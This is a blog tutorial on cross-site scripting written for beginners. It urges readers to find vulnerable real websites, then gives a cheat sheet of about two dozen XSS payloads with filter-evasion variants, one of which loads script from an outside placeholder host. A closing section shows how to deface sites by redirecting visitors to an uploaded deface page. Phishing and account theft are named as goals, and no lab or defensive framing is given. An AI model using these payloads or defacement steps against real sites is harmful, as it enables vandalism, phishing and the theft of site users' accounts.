Today i'm going to Posted a Hand Guide to XSS for Newbies .
A lot of People ask me to write Some Tutorials on XSS , so i've Decided to also cover XSS for them .
What is XSS ?
This in known to Everyone that XSS is also Stands for Cross Site Scripting.XSS is one of The Most Web Application Common Vulnerabilities increasingly Popular in this Time which allow a Attacker to Submitting his malicious Queries or Codes in the Target Website's"Search Boxes" as well as in the Target URL.This vulnerability occurs due to Poor Developing application of the code.A Attacker able to inject his malicious HTML code through client web browsers.
Mostly The Whole XSS Attack is based on Javascript and HTML for Executing malicious Codes in Target Website .Once a attacker will be able to run his code with the Javascript on the Web then when the User will come to the site and click on that malicious link that Javascript will be executed .Mostly People Do XSS and Show a Pop-up With their Name to advertise themselves .
XSS can be used for Phishing as well as Stealing Accounts or we can do some SocialEngineering with XSS.
A Simple XSS Example
This is Simple example of XSS that what we can do with it . For Example a Attacker have found XSS vulnerability in a High Profile Website and which have a lot of users.And there we will be able to run our Malicious code with JAVASCRIPT.Whenever a user come to that website our malicious Code will be Executed and we can use that code for Redirecting the User to any Fake Page that we want or Like Phishing PAGE.XSS ATTACK
First we have to Find a Vulnerable Website for Practicing XSS .Finding XSS vulnerable website is easy than SQLi sites.In SQL injection we simply have to Add single Quote ' at the End of the Parameter to Check if the Target site is vulnerable or Not but in XSS we have to Determine to XSS Vulnerability by Executing Multiple XSS Queries .Mostly That places where we can test For XSS vulnerability are a "SEARCH BOX" or"Login or Register" or any other Input Field where we can execute our Script .
Once we will found a Input Field where we can Execute or Code like a Search Box.
Basically This query is most Common for Testing XSS but you can try other queries as well.
<script>alert("XSS")</script>
Once we will put this Query in the Search Box and then execute it, it will display us a Pop-up with "XSS" String.If there are Normal Filters Then our Query will be Successfully Executed and it shows us a Pop-up but in advanced Filters Some Characters are Blocked and we need to bypass them.
XSS Cheat Sheet:
<script>alert(1);</script><script>alert('XSS');</script>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
'><script>alert(0)</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@import'ja asc
ipt:alert("XSS")';</style>
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
<IMG DYNSRC="javascript:alert('XSS')">
<img src=javascript:alert('XSS')>
<script language=JavaScript>alert('XSS')</script>
<body onunload=javascript:alert('XSS');>
<body onLoad='alert('XSS');'
[color=red' onmouseover='alert('xss')']mouse over[/color]
'/></a></><img src=1.gif onerror=alert(1)>
window.alert('Bonjour !');
<div style='x:expression((window.r==1)?'':eval('r=1;
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
'>><marquee><h1>XSS</h1></marquee>
Understanding XSS WAF's Behaviour
Use Different queries for Better results.Each site WAF's Filter Different Characters.
In some sites when we try to Find XSS vulnerability and sometimes when we failed but if we notice our Payload in source page of the Target Website their are some Characters missing like >, " , /
It is because of that Web Application Firewall is Blocking these character.There we need to bypass these character with different bypassing Techniques.For Example .
Bypassing XSS Payload via Hex Enoding
Bypassing XSS Payload via Ascii Encoding
Defacing via XSS
Many people ask How they Can deface via XSS so i've decided to add this Part also in this Tutorial .A lot of people injecting Sites whole the day for just for defacing.Defacing via XSS is simple as 1,2,3,4,5.So in XSS we have to Put our Deface Page HTML Uploaded Link in our String.we can use some Sites that used for Uploading HTML Files , Like
http://www.pastehtml.com
After Uploading your deface HTML on this site there you will get the Link of your File ,just copy it and Put it in XSS Payload .
<script>window.location="http://www.pastehtml.com/DefacePAGE/";</script>
when you will execute this query in the XSS vulnerable Website there you can see your Deface Page in the Pop-up.
Enjoy :)
No comments:
Post a Comment